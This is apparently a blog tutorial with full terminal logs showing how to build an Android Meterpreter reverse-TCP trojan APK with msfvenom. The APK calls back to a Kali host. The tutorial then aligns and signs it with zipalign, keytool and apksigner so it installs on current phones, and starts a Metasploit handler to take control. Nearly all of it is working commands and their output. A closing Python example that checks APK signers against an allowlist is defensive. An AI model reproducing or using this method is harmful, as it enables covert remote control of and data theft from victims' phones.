
Android Penetration Control

Date: 2023-08-03
Part 1: Generating the Android APK

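1. Use msfvenom to generate an Android APK that is preconfigured to connect back to the Kali host.
lhost=192.168.183.12 (the Kali machine's IP), lport=55555 (the default is 4444; you can choose your own)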

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.183.12 lport=55555 R > t.apk

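This produces a very simple Android app carrying a payload. Run ls -l and you will see a t.apk file in the current directory.

Many tutorials found through a Baidu search stop here, copy the file straight onto an Android phone and install it, and then the connection never comes up. Those tutorials date from a much earlier era; none of us has a phone that old any more. Here, t.apk still has to be aligned and then signed.
Three tools are needed: zipalign, keytool and apksigner.
Kali 2020 installs only keytool by default. Some tutorials mention jarsigner, but Kali 2020 no longer ships it and it is not in the package sources either; apt-get install jarsigner reports that there is no such package. jarsigner is the tool needed for APK v1 signing. Here I use apksigner's v2 signing; the v1 and v2 signing procedures differ, so do not copy one onto the other mechanically.
To understand this part in more depth, search Baidu for zipalign.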


2. Align the APK with zipalign

zipalign -v 4 t.apk tz.apk

3. Generate a key pair

Generate the key pair:
keytool -genkey -v -keystore cg.keystore -alias cg -keyalg RSA -keysize 2048 -validity 10000
Explanation: keytool -genkeypair -keystore <keystore name> -alias <key alias> -validity <days> -keyalg RSA

4. Sign the APK

Sign:
apksigner sign --ks cg.keystore --ks-key-alias cg tz.apk
Explanation: apksigner sign --ks <keystore name> --ks-key-alias <key alias> tz.apk

5. Verify the APK signature

apksigner verify -v --print-certs tz.apk

At this point the work is essentially done. The final file, tz.apk, is the Android app we want.

Android control: full session

root@kali:~# msfconsole
msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (android/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  55555            yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf5 exploit(multi/handler) > set lhost 192.168.183.12
lhost => 192.168.183.12
msf5 exploit(multi/handler) > exploit
[-] Handler failed to bind to 192.168.183.12:55555:- -
[*] Started reverse TCP handler on 0.0.0.0:4444

APK generation stage: full session

┌──(root㉿kali)-[/home/kali/Desktop]
└─# msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.183.12 lport=55555 R > t.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 10190 bytes

┌──(root㉿kali)-[/home/kali/Desktop]
└─# zipalign -v 4 t.apk tz.apk
Command 'zipalign' not found, but can be installed with:
apt install zipalign
Do you want to install it? (N/y)y
apt install zipalign
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following additional packages will be installed:
  android-libbacktrace android-libbase android-libcutils android-liblog android-libunwind android-libutils android-libziparchive libzopfli1
The following NEW packages will be installed:
  android-libbacktrace android-libbase android-libcutils android-liblog android-libunwind android-libutils android-libziparchive libzopfli1 zipalign
0 upgraded, 9 newly installed, 0 to remove and 567 not upgraded.
Need to get 548 kB of archives.
After this operation, 1,726 kB of additional disk space will be used.
Do you want to continue? [Y/n] y
Get:1 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 android-liblog amd64 1:10.0.0+r36-7 [44.4 kB]
Get:2 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 android-libbase amd64 1:10.0.0+r36-7 [41.5 kB]
Get:3 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 android-libunwind amd64 10.0.0+r36-4 [48.3 kB]
Get:4 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 android-libbacktrace amd64 1:10.0.0+r36-7 [153 kB]
Get:5 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 android-libcutils amd64 1:10.0.0+r36-7 [33.3 kB]
Get:6 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 android-libutils amd64 1:10.0.0+r36-7 [62.4 kB]
Get:7 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 android-libziparchive amd64 1:10.0.0+r36-7 [35.5 kB]
Get:8 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 libzopfli1 amd64 1.0.3-1 [101 kB]
Get:9 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 zipalign amd64 1:10.0.0+r36-1 [28.2 kB]
Fetched 548 kB in 1s (449 kB/s)
Selecting previously unselected package android-liblog.
(Reading database ... 268182 files and directories currently installed.)
Preparing to unpack .../0-android-liblog_1%3a10.0.0+r36-7_amd64.deb ...
Unpacking android-liblog (1:10.0.0+r36-7) ...
Selecting previously unselected package android-libbase.
Preparing to unpack .../1-android-libbase_1%3a10.0.0+r36-7_amd64.deb ...
Unpacking android-libbase (1:10.0.0+r36-7) ...
Selecting previously unselected package android-libunwind.
Preparing to unpack .../2-android-libunwind_10.0.0+r36-4_amd64.deb ...
Unpacking android-libunwind (10.0.0+r36-4) ...
Selecting previously unselected package android-libbacktrace.
Preparing to unpack .../3-android-libbacktrace_1%3a10.0.0+r36-7_amd64.deb ...
Unpacking android-libbacktrace (1:10.0.0+r36-7) ...
Selecting previously unselected package android-libcutils.
Preparing to unpack .../4-android-libcutils_1%3a10.0.0+r36-7_amd64.deb ...
Unpacking android-libcutils (1:10.0.0+r36-7) ...
Selecting previously unselected package android-libutils.
Preparing to unpack .../5-android-libutils_1%3a10.0.0+r36-7_amd64.deb ...
Unpacking android-libutils (1:10.0.0+r36-7) ...
Selecting previously unselected package android-libziparchive.
Preparing to unpack .../6-android-libziparchive_1%3a10.0.0+r36-7_amd64.deb ...
Unpacking android-libziparchive (1:10.0.0+r36-7) ...
Selecting previously unselected package libzopfli1.
Preparing to unpack .../7-libzopfli1_1.0.3-1_amd64.deb ...
Unpacking libzopfli1 (1.0.3-1) ...
Selecting previously unselected package zipalign.
Preparing to unpack .../8-zipalign_1%3a10.0.0+r36-1_amd64.deb ...
Unpacking zipalign (1:10.0.0+r36-1) ...
Setting up android-liblog (1:10.0.0+r36-7) ...
Setting up libzopfli1 (1.0.3-1) ...
Setting up android-libunwind (10.0.0+r36-4) ...
Setting up android-libbase (1:10.0.0+r36-7) ...
Setting up android-libziparchive (1:10.0.0+r36-7) ...
Setting up android-libcutils (1:10.0.0+r36-7) ...
Setting up android-libbacktrace (1:10.0.0+r36-7) ...
Setting up android-libutils (1:10.0.0+r36-7) ...
Setting up zipalign (1:10.0.0+r36-1) ...
Processing triggers for libc-bin (2.32-4) ...
Processing triggers for man-db (2.9.4-2) ...
Processing triggers for kali-menu (2021.4.2) ...

┌──(root㉿kali)-[/home/kali/Desktop]
└─# keytool -genkey -v -keystore cg.keystore -alias cg -keyalg RSA -keysize 2048 -validity 10000
Enter keystore password:
Re-enter new password:
What is your first and last name?
  [Unknown]: jackson
What is the name of your organizational unit?
  [Unknown]: jackson
What is the name of your organization?
  [Unknown]: jackson
What is the name of your City or Locality?
  [Unknown]: jackson
What is the name of your State or Province?
  [Unknown]: jackson
What is the two-letter country code for this unit?
  [Unknown]: 22
Is CN=jackson, OU=jackson, O=jackson, L=jackson, ST=jackson, C=22 correct?
  [no]: y
Generating 2,048 bit RSA key pair and self-signed certificate (SHA256withRSA) with a validity of 10,000 days
  for: CN=jackson, OU=jackson, O=jackson, L=jackson, ST=jackson, C=22
[Storing cg.keystore]

┌──(root㉿kali)-[/home/kali/Desktop]
└─# apksigner sign --ks cg.keystore --ks-key-alias cg tz.apk
Command 'apksigner' not found, but can be installed with:
apt install apksigner
Do you want to install it? (N/y)y
apt install apksigner
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following additional packages will be installed:
  libapksig-java
The following NEW packages will be installed:
  apksigner libapksig-java
0 upgraded, 2 newly installed, 0 to remove and 567 not upgraded.
Need to get 847 kB of archives.
After this operation, 980 kB of additional disk space will be used.
Do you want to continue? [Y/n] y
Get:1 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 libapksig-java all 31.0.2-1 [404 kB]
Get:2 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 apksigner all 31.0.2-1 [443 kB]
Fetched 847 kB in 1s (1,115 kB/s)
Selecting previously unselected package libapksig-java.
(Reading database ... 268245 files and directories currently installed.)
Preparing to unpack .../libapksig-java_31.0.2-1_all.deb ...
Unpacking libapksig-java (31.0.2-1) ...
Selecting previously unselected package apksigner.
Preparing to unpack .../apksigner_31.0.2-1_all.deb ...
Unpacking apksigner (31.0.2-1) ...
Setting up libapksig-java (31.0.2-1) ...
Setting up apksigner (31.0.2-1) ...
Processing triggers for kali-menu (2021.4.2) ...
Processing triggers for man-db (2.9.4-2) ...

┌──(root㉿kali)-[/home/kali/Desktop]
└─# apksigner verify -v --print-certs tz.apk                                127 ⨯
Exception in thread "main" java.io.FileNotFoundException: tz.apk (No such file or directory)
        at java.base/java.io.RandomAccessFile.open0(Native Method)
        at java.base/java.io.RandomAccessFile.open(RandomAccessFile.java:345)
        at java.base/java.io.RandomAccessFile.<init>(RandomAccessFile.java:259)
        at java.base/java.io.RandomAccessFile.<init>(RandomAccessFile.java:214)
        at com.android.apksig.ApkVerifier.verify(ApkVerifier.java:143)
        at com.android.apksigner.ApkSignerTool.verify(ApkSignerTool.java:516)
        at com.android.apksigner.ApkSignerTool.main(ApkSignerTool.java:88)

┌──(root㉿kali)-[/home/kali/Desktop]
└─# zipalign -v 4 t.apk tz.apk                                                1 ⨯
Verifying alignment of tz.apk (4)...
      49 AndroidManifest.xml (OK - compressed)
    1779 resources.arsc (OK - compressed)
    1992 classes.dex (OK - compressed)
    8160 META-INF/ (OK)
    8210 META-INF/MANIFEST.MF (OK - compressed)
    8447 META-INF/SIGNFILE.SF (OK - compressed)
    8713 META-INF/SIGNFILE.RSA (OK - compressed)
Verification successful

┌──(root㉿kali)-[/home/kali/Desktop]
└─# apksigner verify -v --print-certs tz.apk
DOES NOT VERIFY
ERROR: JAR signer SIGNFILE.RSA: JAR signature META-INF/SIGNFILE.RSA uses digest algorithm SHA-256 and signature algorithm RSA which is not supported on API Level(s) 10-17 for which this APK is being verified

┌──(root㉿kali)-[/home/kali/Desktop]
└─# apksigner sign --ks cg.keystore --ks-key-alias cg tz.apk                  1 ⨯
Keystore password for signer #1:

┌──(root㉿kali)-[/home/kali/Desktop]
└─# apksigner verify -v --print-certs tz.apk
Verifies
Verified using v1 scheme (JAR signing): true
Verified using v2 scheme (APK Signature Scheme v2): true
Verified using v3 scheme (APK Signature Scheme v3): true
Verified using v4 scheme (APK Signature Scheme v4): false
Verified for SourceStamp: false
Number of signers: 1
Signer #1 certificate DN: CN=jackson, OU=jackson, O=jackson, L=jackson, ST=jackson, C=22
Signer #1 certificate SHA-256 digest: 0b0d4e001cd8419178570d9b654a4e12c04a5fd6b43ddba495cbe3c3daca25ad
Signer #1 certificate SHA-1 digest: 098dabd0918e21cc5f3d5315a476b64199835f51
Signer #1 certificate MD5 digest: 285862ef117e8115197d25f937e51de9
Signer #1 key algorithm: RSA
Signer #1 key size (bits): 2048
Signer #1 public key SHA-256 digest: 599dac27b2c16dde82fe2911857746cce415ea8cd1932aa0f3d70c185df3b059
Signer #1 public key SHA-1 digest: 6560ca068e18184624c0e40a32b5f075ed114a76
Signer #1 public key MD5 digest: be0f581cf0cec32e300f49098271b435

┌──(root㉿kali)-[/home/kali/Desktop]
└─#
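
The `apksigner verify -v --print-certs` output above is what a reviewer triaging an unknown APK reads first: a "Verifies" line only proves the file is intact under some key, not that a trusted publisher signed it. The following is an added example, not part of the original page: it parses that output and checks the signer against a pinned allowlist. The names `parse_verify`, `triage` and `TRUSTED` are hypothetical, and the sample lines are abridged from the session log above.

```python
import re

# Output of `apksigner verify -v --print-certs`, abridged from the session log on this page.
SAMPLE = """\
Verifies
Verified using v1 scheme (JAR signing): true
Verified using v2 scheme (APK Signature Scheme v2): true
Verified using v3 scheme (APK Signature Scheme v3): true
Verified using v4 scheme (APK Signature Scheme v4): false
Number of signers: 1
Signer #1 certificate DN: CN=jackson, OU=jackson, O=jackson, L=jackson, ST=jackson, C=22
Signer #1 certificate SHA-256 digest: 0b0d4e001cd8419178570d9b654a4e12c04a5fd6b43ddba495cbe3c3daca25ad
"""

# Hypothetical allowlist of publisher certificate SHA-256 digests (constructed value).
TRUSTED = {"aa" * 32}

def parse_verify(text):
    """Parse apksigner verify output into {verifies, schemes, signers}."""
    report = {"verifies": False, "schemes": {}, "signers": {}}
    for line in text.splitlines():
        line = line.strip()
        if line == "Verifies":
            report["verifies"] = True
        elif m := re.match(r"Verified using (v[\d.]+) scheme .*: (true|false)$", line):
            report["schemes"][m.group(1)] = m.group(2) == "true"
        elif m := re.match(r"Signer #(\d+) certificate (DN|SHA-256 digest): (.+)$", line):
            key = "dn" if m.group(2) == "DN" else "sha256"
            value = m.group(3) if key == "dn" else m.group(3).lower()
            report["signers"].setdefault(int(m.group(1)), {})[key] = value
    return report

def triage(report, trusted):
    """Return findings: failed verification, unpinned signer, malformed DN country."""
    findings = []
    if not report["verifies"]:
        findings.append("signature does not verify")
    for n, s in sorted(report["signers"].items()):
        if s.get("sha256") not in trusted:
            findings.append(f"signer #{n} not in allowlist: {s.get('dn')}")
        c = re.search(r"\bC=([^,]*)", s.get("dn", ""))
        if c and not re.fullmatch(r"[A-Za-z]{2}", c.group(1).strip()):
            findings.append(f"signer #{n} DN country code is not two letters: {c.group(1)}")
    return findings
```

The allowlist check is the one that carries weight; the country-code check is only a weak heuristic for throwaway self-signed certificates such as the one generated in step 3.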
